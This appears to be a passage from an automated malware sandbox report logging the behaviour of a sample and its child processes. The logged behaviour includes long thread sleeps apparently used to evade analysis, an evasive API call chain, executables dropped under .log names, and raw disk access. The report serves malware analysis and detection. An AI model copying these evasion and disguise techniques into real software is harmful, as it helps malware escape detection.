Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 596926
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 594834
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 594672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599843
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599705
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599281
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 3600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 596172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 595234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594859
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594515
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594319
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594140
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 593832
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 593523
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 589297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 589047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 588625
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 588265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587593
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 586656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 586172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585949
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585687
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585437
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585062
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 584780
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 584297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583968
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581730
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581591
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581390
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581218
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581018
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 579265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 579047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 300000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578875
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578130
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577872
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577748
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577621
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577449
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577328
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577156
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577017
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576863
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576462
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576353
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 574718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 574359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573713
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573450
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573338
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573230
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573125
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573015
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572905
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572794
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572650
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572546
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572421
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572179
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572019
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571890
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571781
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571587
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 570031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569697
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569318
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568906
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568788
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568686
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568466
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568250
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\portintosvc\driverInto.exe Window / User API: threadDelayed 4450
Source: C:\portintosvc\driverInto.exe Window / User API: threadDelayed 1129
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1944
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2397
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1698
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2078
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Window / User API: threadDelayed 7091
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Window / User API: threadDelayed 2267
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nntxgNlb.log
Source: C:\portintosvc\driverInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cvopZsny.log
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fJkHwTWu.log
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VaRrMrQM.log
Source: C:\portintosvc\driverInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uCFUtfTN.log
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TQvqMYlM.log
Source: C:\portintosvc\driverInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SHKzphsQ.log
Source: C:\portintosvc\driverInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DtICHrzA.log
Source: C:\portintosvc\driverInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EqkKdrOv.log
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mqRpKNWg.log
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -600000s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -599875s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -599766s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -599641s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -599516s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -599406s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -100000s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99874s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99765s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99656s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99546s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99437s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99327s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99218s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99109s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99000s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98890s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98781s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98672s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98562s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98453s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98343s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98234s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98125s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98015s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -597282s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -597125s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -596926s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -594834s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -594672s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 5852 Thread sleep time: -30000s >= -30000s
Source: C:\portintosvc\driverInto.exe TID: 6148 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep count: 1944 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep count: 1948 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep count: 2453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 Thread sleep count: 2397 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372 Thread sleep count: 340 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep count: 1698 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep count: 2078 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8068 Thread sleep time: -30000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -599843s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -599705s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -599281s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -599000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -598578s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -598297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8152 Thread sleep time: -7200000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -598047s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -596172s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -595234s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -594859s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -594515s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -594319s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -594140s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -593832s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -593523s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -589297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -589047s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -588625s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -588265s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -587984s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -587593s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -587000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -586656s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -586172s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -585949s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -585687s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -585437s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -585062s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -584780s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -584297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -583968s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -583656s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -583312s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -582922s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -582577s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -582234s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581922s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581730s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581591s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581390s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581218s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -581018s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -579265s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -579047s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8152 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -578875s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -578312s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -578130s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577984s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577872s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577748s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577621s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577449s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577328s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577156s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -577017s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -576863s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -576718s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -576578s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -576462s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -576353s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -574718s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -574359s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573713s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573578s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573450s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573338s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573230s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573125s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -573015s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572905s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572794s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572650s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572546s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572421s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572179s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -572019s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -571890s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -571781s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -571587s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -570031s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -569697s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -569318s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -569031s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568906s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568788s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568686s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568577s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568466s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568359s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176 Thread sleep time: -568250s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6652 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\portintosvc\driverInto.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0100A69B
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0101C220
